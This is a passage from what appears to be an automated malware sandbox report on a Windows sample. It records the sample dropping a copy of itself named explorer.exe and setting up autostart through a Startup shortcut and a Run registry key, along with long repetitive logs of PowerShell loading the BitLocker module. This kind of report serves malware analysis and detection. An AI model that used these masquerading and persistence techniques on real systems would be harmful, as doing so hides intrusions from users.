            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B977CED push eax; iretd 11_2_00007FFD9B977D79

            Persistence and Installation Behavior

            barindex
            Drops PE files with benign system names
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to dropped file
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to dropped file
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnkJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnkJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
